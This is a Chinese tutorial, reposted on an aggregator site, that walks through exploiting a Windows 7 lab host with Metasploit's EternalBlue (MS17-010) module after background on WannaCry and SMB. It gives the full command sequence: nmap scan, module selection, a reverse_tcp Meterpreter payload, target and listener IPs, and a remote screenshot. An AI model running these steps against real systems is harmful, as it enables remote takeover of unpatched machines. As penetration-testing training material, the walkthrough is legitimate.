网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝***演练实战
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝***演练实战,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1868字,纯文字阅读大概需要3分钟。
内容图文
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络***干货!
基础知识介绍:
1.何为永恒之蓝?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被***的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
***步骤:
一、确定***目标
1.1使用kali打开nmap扫描目标主机。
使用nmap执行命令 nmap -sS -A 192.168.17.149
-sS(使用SYN扫描),-A(启用操作系统检测和版本检测)。
1.2根据我们的扫描结果可以大致判断该系统可能存在永恒之蓝漏洞。
二、***步骤
2.1执行命令msfconsole打开metasploit。
2.2执行命令 search ms17_010 查询我们所需要的***模块。
2.3找到我们需要的***模块后执行命令,
use exploit/windows/smb/ms17_010_eternalblue
2.4执行命令 search payload 查找我们需要的payload。
2.5接下来我们利用该payload
执行命令 set payload windows/x64/meterpreter/reverse_tcp。
2.6执行命令 show options 来查看我们所需要设置的参数。
其中RHOSTS(被***计算机IP)和LHOST(自己kali IP)是需要自己设置。
2.7执行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149即可。
2.8在设置好一切之后只需要执行命令 exploit 即可自动开始***。出现截图中的回显时就表示已经***成功了。
2.9我们只需要执行help即可查看我们能够执行哪些操作。
最后我们执行了 meterpreter > screenshot 对被***对象进行了屏幕截图测试。
辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux***与白帽编程技巧哦!
点我学习更多Kali Linux***测试与网络***实战技巧!请添加链接描述
内容总结
以上是互联网集市为您收集整理的网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝***演练实战全部内容,希望文章能够帮你解决网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝***演练实战所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。